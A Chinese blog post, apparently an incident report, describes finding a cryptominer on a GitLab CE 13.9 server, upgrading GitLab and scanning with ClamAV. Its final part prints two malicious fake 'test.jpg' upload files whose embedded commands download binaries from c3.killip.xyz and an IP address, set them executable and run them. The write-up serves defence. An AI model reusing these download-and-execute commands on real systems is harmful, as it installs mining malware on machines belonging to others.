Linux矿虫现形记

临文乍了了，彻卷兀若无。这篇文章主要讲述Linux矿虫现形记相关的知识，希望能为你提供帮助。
?作者：田逸（formyz）?
江湖救急，一老友告知，一运行Gitlab的主机负载很高，并且把整个出口带宽都耗尽了，希帮忙处理。根据经验，直接答复“很可能被挖矿了”。在取得系统权限以后，登录到该系统。

查看系统进程，除了发现挖矿进程“xmrig”外，还有两个命名怪异的进程“diofiglos”与“cacascqw”。试着用kill指令绞杀挖矿进程“xmrig”，杀掉一个又再启动一个，无法消灭之。是不是有自动任务在时刻在探测挖矿进程是否处于运行状态呢？查看Crond配置，未有发现。

该系统运行环境为Gitlab，版本号为Gitlab-ce-13.9.0-ce，以此版本号为关键字，在搜索引擎里进行查找，果然有问题。

进一步了解到Gitlab-ce-13.9这个版本确实受到影响，需要升级到更高的版本才可以堵住漏洞。在征得同意之后，我就对这个Gitlab-ce-13.9进行升级，一步步升级到Gitlab-ce-14.9.2-ce.0.el7.x86_64（Gitlab升级需要一个版本一个版本的生，不能跨越，有点奇葩）。

靠手工清除木\\马，比较困难，这里我们请出大名鼎鼎的Clamav来帮忙。在Centos 7下，如果没有安装clamav，可在系统命令行下执行如下指令进行安装：

yum install epel-release yum install clamav

Clamav安装好以后，必须对病\\毒库进行更新方可进行扫描操作。因病\\毒库服务器位于海外，执行指令“freshclam”更新速度可能比较耗时，请耐心等待。更新正确完成以后，就可以执行如下指令进行全系统扫描：

clamscan -I –r / -l /var/log/clamscan.log

扫描系统，根据服务器性能，花费的时间可能差异较大，总之，是非常耗时的，建议将其放在“screen”里进行，然后该睡觉就去睡觉，该干别的就干别的去。当然，也可以时不时查看扫描日志文件”/var/log/clamscan.log”了解是否发现木\\马。等系统扫描完毕后，果然中招了。

【Linux矿虫现形记】从日志输出可明确判断，木\\马一定是利用Gitlab漏洞钻进来的。挂马者很狡猾，把目录命名为中横线“-”，如果不仔细点，还不好处理。

不让你进这个“-”目录，有点水平呢。要想进目录或者查看木\\马文件，用鼠标复制粘贴，就可以绕过这个怪异的命名为横杠的目录“-”。来，我们打开那个伪造的图片文件test.jpg，看看这个李鬼是什么情况。

[root@localhost60f6fdba34ae3c75a4e36d018818517c]# pwd /var/opt/gitlab/gitlab-rails/uploads/-/system/temp/60f6fdba34ae3c75a4e36d018818517c [root@localhost60f6fdba34ae3c75a4e36d018818517c]# more test.jpg AT& TFORM FORM (Copyright "\\ " . qx wgethttp://c3.killip.xyz/dabitlogs \| curl http://c3.killip.xyz/dabitlogs -odabitlogs \| chmod 777 dabitlogs \| nohup ./dabitlogs \| wget http://c3.killip.xyz/diofiglos\| curl http://c3.killip.xyz/diofiglos -o diofiglos \| chmod 777 diofiglos \| nohup ./diofiglos . \\ " b ") ) [root@localhostb65777950e1ac8436df45274934c14b1]# pwd /var/opt/gitlab/gitlab-rails/uploads/-/system/temp/b65777950e1ac8436df45274934c14b1 [root@localhostb65777950e1ac8436df45274934c14b1]# more test.jpg AT& TFORM FORM (Copyright "\\ " . qxwgethttp://182.87.223.30:9999/cacascqw; chmod 777 cacascqw; ./cacascqw; curlhttp://182.87.223.30:9999/cacascqw --silent -O; chmod 777 cacascqw; ./cacascqw. \\ " b ") )